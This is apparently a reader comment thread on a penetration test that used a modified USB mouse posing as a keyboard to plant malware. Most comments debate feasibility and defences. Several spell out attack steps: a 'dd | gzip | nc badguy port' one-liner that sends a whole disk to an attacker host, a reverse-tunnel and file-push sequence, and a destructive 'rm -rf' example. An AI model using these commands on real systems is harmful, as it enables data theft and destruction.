When hackers from penetration testing firm Netragard were hired to pierce the firewall of a customer, they knew they had their work cut out. The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits. …
There's one in the post to you
Not saying in what form it'll reach you though.
Yes, it will
"...programmed to wait 60 seconds after being plugged in to a computer and then enter commands into its keyboard that executed malware stored on the custom-built flash drive snuck into the guts of the Logitech mouse."
That's not to say that a different attack might only send key strokes, but this one used an external drive that is easily blocked.
Same attack on Linux
Do I take it if such an attack would be targeted at Linux (or other *nix) - that although the mouse would indeed be recognised as a mouse (or keyboard) by the kernel and subsequently allowed to pass commands to the current screen or terminal - it would really be limited to the privileges of the currently logged user? Thus, if this attack would be run against a reasonably secured box - without additional sophisticated privilege escalation techniques - I assume it would have really limited impact, due to the limited privileges normally assigned to a regular user?
Well, unless I'd sudo'ed already. Or have a terminal open to another box. Or ...
And some people are using it for marketing.
Just don't count on that!
It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string.
No OS is safe against this because it's a hardware-level attack. The same thing happens if somebody would embed malicious code into the firmware of your hard-disk or network card.
Oh, and for the same reason, two factor authentication will not work either.
The solution to this would be a DRM-like scheme where the CPU will not trust any piece of hardware, unless cryptographic signature are verified and found to be correct. Would you like that kind of PC ?
@Same attack on Linux
Yes and no.
The basic idea is the same, if you can move the mouse and/or type key strokes you can do a LOT.
It is also likely (e.g on Ubuntu) that you could have a USB drive auto-mounted with a known name (based on the volume ID/name) so loading arbitrary software is also possible.
Now unless you were lucky and able to type in a terminal opened for root (or recently sudo-ed) and the user is privileged and not terribly observant, escalating is not as likely, but still possible depending on the user and/or exploits you can muster.
But if all you wanted to do was slurp the contents of the user's home directory and/or reveal network details that could help another attack, which could have a wealth of sensitive information, then it is easy! Without attempting to hide your operations, just open command dialogue with Alt+F2, then enter a command such scp or rsync with details of a dodgy destination server...
@Just don't count on that
As a 'mouse' or other USB device it would not know what was typed on another keyboard-like input device, so not that simple..
But if you did the same modification to a keyboard, then yes it is quite simple...
Not that easy...
"It's easy to code a loop waiting for "su" or "sudo" at the beginning of a character string." But how do you get that code to run and how do you get that info out to the USB device?
The only way to do that would be by attacking the keyboard where the data is available.
"No OS is safe against this because it's a hardware-level attack." It is not a hardware level attack, but an OS level one. If you were using a software environment that only ran a specific application with no ability to start a new shell etc, then this would not work.
@Not that easy...
Ok, build it into the keyboard. Then you know its typed.
Or run a program at the current execution level that pretends to be your desktop (thus getting all keystrokes and mouse movement) and display some sort of error that you'd want to raise your login level to fix...
Hackers pierce network with jerry-rigged mouse
"the technique can work against a variety of operating systems, not just Windows."
More details, or it's just FUD.
You want details ? Go read my Launchpad bug linked above.
The USB device pretends to be the user typing on a keyboard
So it can do anything the user can, as long as it doesn't need to know anything the user knows.
In other words, it can do anything the user might be able to do without a password. If you already know the target operating system (or have a list of target operating systems), then it can issue suitable keyboard commands to upload interesting information, or download a program to do interesting things.
Ok, your device only has user privileges, but for a lot of attacks that may be enough.
Which leads to the question - should you be worried?
I'd say that unless you're doing something particularly secret and juicy, I doubt it as the attack is pretty expensive - and if the mark tosses the freebie into the bin, notices something odd and pops the lid, or even simply uses it on a system that doesn't contain the stuff you're trying to get, then it fails.
Cool idea though - hats off to PJRC and/or Atmel for the very-subtle marketing ploy.
Well, I'd be worried even if I wasn't doing something...
... particularly secret or juicy.
You don't need sudo privileges for rm -rf /home/current_user/* to do significant damage to your account.
... has always been a game of cat and mouse.
A software restriction policy is useful protection.
A software restriction policy might not prevent all malicious actions possible with this kind of exploit, but it would prevent malware being launched on the PC from the mouse's USB memory. Which I assume is the main component of the exploit, the mouse's controller being preprogrammed to simulate the clicks needed to do this.
If the user is limited, the the mouse controller would also find it hard to circumvent the policy by copying the malware to the computer's HD, since locations which are writable to a limited user will typically not permit software launch.
Clever - but not new
An inline input device can trivially
- Capture all keystrokes and log to it's hardware store for later retrieval
- Be made to transmit all keypresses and mouse movements wirelessly
- Switch from 'user input' mode to 'remote input' mode, to over-ride input
- Inject key sequences in a pre-defined sequence
- Upload code to the target machine - this is the most complex of all (usually requires exploit code to avoid detection by o/s/AV) - refer to this article
- Uploaded code can be used to do keylogging, screen grabs, remote access and upload captured data (hidden locally) via http to a remote site - all easy to do and simple avoid anti-virus
Hell - if you don't believe me, try to prove me wrong and I'll cite you a 'how-to' for every single one!
Um, neat idea but very limited in practice
The device sends keyboard commands from a device that no-one would suspect is sending such commands - clever. But those commands are useless unless the software on the connected computer is PRECISELY what those keyboard commands are expecting - the device has no way of telling that the computer is not in fact running McAfee (and indeed, some very particular version of McAfee) but some other anti-virus or no anti-virus at all (not to mention the keystrokes required to launch some software from the device in the first place).
The commands being sent to the computer could very well lead to some very odd behaviours if it isn't the expected OS and software on the computer, instantly revealing that something is afoot.
Sure, usual strategies for identifying and removing the source of such odd behaviours are not going to work, but the net result will be the same - odd behaviours, not a compromised computer (unless and until the "perfect storm" of required OS and anti-virus software etc somehow contrives to later appear on the attached computer).
Similarly, I struggle to believe that a universal set of commands can be made to work regardless of the OS on the connected PC.
Yes, the technique can be made to work against a variety of OS's, but any one such device once made is going to be very firmly bound to just one OS.
Which brings me to another problem with this technique as a practical threat...
Yes, everyone picks up promotional USB drives at conferences and events and merrily plugs them into their computers without thinking. But a mouse? Really?
How do we get this device into the hands of someone we wish to attack?
"Here, take this mouse - oh wait. Can I just ask, what OS do you use? Oh Linux... OK, in that case, can you take this mouse instead...? Uh, and what anti-virus package do you use? OK, forget that mouse, this is the one... oh, um, what version of XYZ anti-virus is that...? ah.. hang on a minute... oh no, sorry, we don't have a mouse for that one."
Setting aside motivation and whether something is A Good Idea™ in terms of it's goals, clever ideas need practical applications, otherwise they might just as well be dumb ideas.
As far as I can see, this one has Dumb Idea written all over it.
@Um, neat idea but very limited in practice
This is a highly targeted attack needing money & skill. Not a mass market drive-by sort of web browser hack for mum & dad's ageing PC.
I suspect anyone deploying this will have done their homework and got a good idea of what the victim is using. Most likely it will be the "corporate Windows image" for 99% of the workforce, so you can work from that point onwards...
Can you read?
FFS. Did you read the article?
"To get someone from the target company to use the mouse, Netragard purchased a readily available list names and other data of its employees. After identifying a worker who looked especially promising, they shipped him the modified mouse, which they put back in its original packaging and added marketing materials so the shipment would look like it was part of a promotional event."
"Three days later, the malware contained on the mouse connected to a server controlled by Netragard"
Not an idea... they actually managed to do it!
"How do we get this device into the hands of someone we wish to attack?"
They've just done exactly that. It's a shame you think it's a "Dumb Idea", but since the customer hired Netragard, and not a commenter on The Register, I expect we can leave the expert assessment to them.
It doesn't need to install malware nor worry about A/V.
It can install goodware with malintent.
This changes the game as the dumb user becomes a genius hacker "avatar" by proxy.
Anything you can do physically at the machine, it can do too thus:
use a browser to get and install putty vnc winscp
configure putty with a private key
ssh into remote machine and create reverse tunnel for vnc
configure winscp, login to attacker machine, send \*.* or whatever
On linux, in a root terminal this will grab an entire hard drive until noticed:
nice n19 dd if=/dev/sda bs=4096 | gzip | nc badguy port
All it has to do is pick a time when machine is on and owner not there.
It *can* work
As long as the internal logic on the device contains enough memory and instructions the enhanced mouse can be used on any environment. The device could deduct from the user's input whether the system is Windows, Linux or something else. Waiting for typical commands such as ls, cat, vi and so on would lead the device to think we're in Linux land whereas cmd, dir, Win+R and other keystroke combinations would be a sign of Windows.
The attack can never be idiot proof due to system configurations, reliance on system utilities that aren't there, disabled terminal access, firewall settings and so forth. But grabbing the user's own data and sending it with e.g. FTP would work in most settings, I'm sure.
You're pretty naive. This was an idea that was implemented in a reasonably trivial piece of software, but it was trivial and it worked.
A cleverer use of this exploit would be to buffer the keystrokes and run heuristic detection based on the commands entered. In reality there's Windows, and there's Unix, and there's also the way the USB driver stacks interact with the device. With enough logging, information and time for the inbuilt computer to get a pretty good idea of which environment it's being used, it can be used to download and execute a bootstrap mechanism which can then go on to do the real damage. It can even use its internal clock and a delay mechanism to wait until the dead of night and minimize the risk that the user can detect what's going on.
Or if so inclined, a hacker could program the device to try several trial and error strategies, waiting for a software callback that would be initiated by successfully bootstrapping a piece of malware.
The possibilities are numerous.
I have been saying for years...
Beware the Geeks bearing gifts.
USB = Universal Security Breach
or Unlimited Security Breach
Very neat attack, although I must admit being told you couldn't use "social networks, telephones, and other social-engineering vectors" is kind of like testing a body armour and saying "Oh, but you can't shoot at the head, arms or legs", i.e. knowing there are already serious shortfalls in the protection in those areas.
... they probably had someone much cheaper doing the ordinary "social networks, telephones and other social-engineering vectors" testing, or already had them done. Or the point was to prove to somebody that those aren't the exclusive points of attack rather than that the system is safe.
Whats this a story about Hackers that contains hackers - been a while
Nice, this is how I define hacking and not the ability to launch a DDOS.
Highlights the need for a SecureUSB standard were the admin approves hardware devices.
It would probably be difficult to implement for little gain. Although it could be done, I guess, in software with something like UUIDs. But then you would need to think about protecting from UUID spoofing. And it would be a total PITA to constantly manage hardware replacements.
It's easier to deny access to USB/PS2 ports completely and then you're safe(er).
"The client specifically ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits."
FAIL - they used both social engineering and physical access.
Seems like noone noticed...
this is the first in a lot of comments that have actually pointed this out while everyone else is congratulating the hackers... reading comprehension much?
(1) It depends on how you define "social engineering", as in this case they did not manipulate the target beyond posting the device to a selected individual.
(2) They did not have local physical access. They did not break in to the building or its infrastructure. This was a real Trojan horse, or more precisely, a Trojan mouse.
So I would say they did the job, and I would also say that asking for your defences to be tested while ruling out some of the known attack vectors is a bit dumb of the hiring company.
"Look at the size of my door lock! Bet you cant pick it!"
"Where are your window locks?"
My hats off to them
This is what pen testing is all about nice work to those guys. The scary thing other countires like China & Russia do this all day every day to the US and their own ppl. Small buisnesess that work or collaborate with goverment contractors are just a stepping stone to the big fish they want to sink their programming hooks in...
Shouldn't normally work
They had to know which antivirus to suppress, AND they needed that antivirus to not scan removable media nor intervene with a sandbox until the user intervenes and changes the default, which normally there is no command line to be rid of so the device would have to emulate a mouse, run a program to find the popup which it can't, so it's game over.
It could try to connect remotely but a firewall "might" stop that. I'm not suggesting it couldn't work but you would need to know more about your target than (nothing really, social engineering of some sort is needed even if it is not a social networking site or phone calls).
Also, as a matter of routine removable storage is disabled on critical systems and those networked to them. There would be no volume mounted to execute the payload from.
You need to read the article again.
so - this is a complete FAIL
"ruled out the use of social networks, telephones, and other social-engineering vectors, and gaining unauthorized physical access to computers was also off limits"
FAIL as social engineering was used.
Eloquent hack, but invalid.
HAHAHAHAHAHAHA and then again AHAHAHAHAHAHAHAHAHAHAHAHA...brilliant.
Arduino is an Italian masculine first name, meaning...
Hands up who's just taken their mouse apart to check?
My excuse was it needed a clean ;-)
Beware the "Free Lunch"
So they sent the doctored mouse to an employee as a "sales promotion."
Oh look at the great free mouse someone sent me! Think I'll take it to the office and try it out!
See, nothing in life is truly "Free" LOL
I am reminded of that TV show, Danger Mouse...
60% of people plug thumbdrives they find outside into computers?
Ugh. I would not plug any item I found in a car park into my computer any more than I would eat a stepped-on pie or sandwich I saw lying on the pavement. Yuck!
Unsolicited gifts are also a point of suspicion, and have been to me since the 70s. Despite there being laws against it, I occasionally got "gifts" sent in that were subsequently invoiced for, or was supposed to retain only if I took out a subscription or something. While the law technically allowed me to keep whatever was sent, the trouble the senders usually caused over it made it not worth keeping. So from that, I have a healthy skepticism concerning unsolicited deliveries. Seems like there's another reason to keep that going now.
I admire your self-control. While I'm fairly paranoid about security I'm afraid to say it's almost certain that my curiosity would get the better of me (regarding the thumb drive, not the stepped-on pie).
Having said that, it would be tried in a non-networked sacrificial laptop that would be nuked and re-imaged immediately afterwards. There's quite a wide margin between curiosity and idiocy.
.. only shows human beings are the weakest link.
Why would an OS allow a mouse to 'type'
This seems like a flaw in the OS. The built-in driver code that handles HID devices like keyboards and mice is able to distinguish between the two, so it ought to default to not letting a mouse send characters. If you really have some weird need for that, fine, you can tweak the registry or whatever.
Hopefully the Linux kernel guys have already seen this and checked in such a fix, and presumably after going through five layers of middle management, Microsoft will do so also.
I hope, as well, that any other USB device that isn't a keyboard or mouse, like a USB key, phone, hard drive, printer, modem, etc. would also not be allowed to act as a HID device and send either keyboard characters or mouse movements/button presses (which in a GUI, along with cut and paste, could probably be used to 'type' commands as well, albeit with a bit higher level of difficulty)
It goes without saying that devices you don't expect to mount a filesystem, like a keyboard, mouse or printer, should not be able to do so.
Clearly the guys programming USB code have never thought for a moment about basic security!
Because it identifies itself as both. Imagine you plugged in a mini hub into which was already plugged both a mouse and keyboard. What would the OS see? That's what this device effectively is.
It isn't just a mouse. Think of it as plugging in a usb hub with a mouse and a keyboard attached.
Actually, it's one device with multiple roles.
The generic HID device allows you to define multiple endpoints in the *same* device, thus one HID-compliant device can be both the mouse and the keyboard.
The HID device I'm typing on right now is also my mouse - according to Windows 7, it's one device that sits in both the Keyboard and Mouse categories.
There's a lot of them around - it just tells the OS that it's both. Windows normally enumerates it saying "HID-compliant device" if it says anything and doesn't actually say whether it thinks it's a keyboard or mouse.
usb live ...
...couldn't you have this begin a usb live linux, on the next start. All user interfaces are locked out, while the screen reads: "Update in progress" with a X minute countdown timer; and it would have relatively free reign within the machine.
Paris, because she would leave for a break...
- iPad? More like iFAD: We reveal why Apple ran off to IBM
- +Analysis Microsoft: We're making ONE TRUE WINDOWS to rule us all
- Climate: 'An excuse for tax hikes', scientists 'don't know what they're talking about'
- Analysis Nadella: Apps must run on ALL WINDOWS – PCs, slabs and mobes
- Apple: We'll unleash OS X Yosemite beta on the MASSES July 24